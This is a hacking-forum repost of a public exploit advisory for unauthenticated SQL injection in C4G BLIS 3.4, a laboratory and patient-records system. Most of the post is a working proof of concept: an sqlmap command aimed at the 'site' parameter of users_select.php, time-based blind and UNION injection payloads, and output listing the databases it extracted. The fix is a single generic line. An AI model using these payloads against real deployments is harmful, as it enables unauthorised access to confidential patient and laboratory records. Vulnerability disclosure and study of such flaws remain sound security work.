跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

C4G Basic Laboratory Information System (BLIS) 3.4 - SQL Injection


Anonymous

推荐的帖子

# Exploit Title: C4G Basic Laboratory Information System (BLIS) 3.4 - Multiples SQL Injection
# Date: 01/31/2019
# Software Links/Project: https://github.com/C4G/BLIS | http://blis.cc.gatech.edu/index.php
# Version: C4G Basic Laboratory Information System v3.4
# Exploit Author: Carlos Avila
# Category: webapps
# Tested on: Windows 8.1 / Ubuntu Linux
# Contact: http://twitter.com/badboy_nt

1. Description
  
C4G Basic Laboratory Information System (BLIS) is an open-source system to track patients, specimens and laboratory results. C4G BLIS is a joint initiative of Computing for Good (C4G) at the Georgia Institute of Technology, the Centers for Disease Control and Prevention (CDC) and Ministries of Health of several countries in Africa. 

This allows unauthenticated remote attacker to execute arbitrary SQL commands and obtain private information. Admin or users valid credentials aren't required. In a deeper analysis other pages are also affected with the vulnerability over others inputs.

It written in PHP it is vulnerable to SQL Injection on multiples occurrences. The parameters affected are detailed below:

http://192.168.6.101:4001/ajax/users_select.php [parameters affected via GET method: site]



2. Proof of Concept



sunday:sqlmap badboy_nt$ python sqlmap.py --url "http://192.168.6.101:4001/ajax/users_select.php?site=1275969" --random-agent --tamper randomcase --level 3 --dbms mysql --threads 3 --dbs
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.1.83#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:51:33 /2019-02-01/

[15:51:33] [INFO] loading tamper module 'randomcase'
[15:51:33] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16' from file '/Users/badboy_nt/Tools/sqlmap/txt/user-agents.txt'
[15:51:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: site (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: site=1275969 AND (SELECT * FROM (SELECT(SLEEP(5)))owvW)-- Lzob

    Type: UNION query
    Title: Generic UNION query (random number) - 12 columns
    Payload: site=1275969 UNION ALL SELECT CONCAT(0x71626a7071,0x5754617757446f465a4f41676352594968504a457651676852694d506c69796b6b567643736e6967,0x7171716a71),4936,4936,4936,4936,4936,4936,4936,4936,4936,4936,4936-- tnMf
---
[15:51:35] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:51:35] [INFO] testing MySQL
[15:51:36] [INFO] confirming MySQL
[15:51:37] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.4.32
back-end DBMS: MySQL >= 5.0.0
[15:51:37] [INFO] fetching database names
[15:51:38] [INFO] used SQL query returns 4 entries
[15:51:38] [INFO] starting 3 threads
[15:51:39] [INFO] retrieved: 'information_schema'
[15:51:40] [INFO] retrieved: 'blis_127'
[15:51:41] [INFO] retrieved: 'blis_revamp'
[15:51:43] [INFO] retrieved: 'mysql'
available databases [4]:                                                                                                                                              
[*] blis_127
[*] blis_revamp
[*] information_schema
[*] mysql


3. Solution:

Application inputs must be validated correctly throughout the development of the project.
            
链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...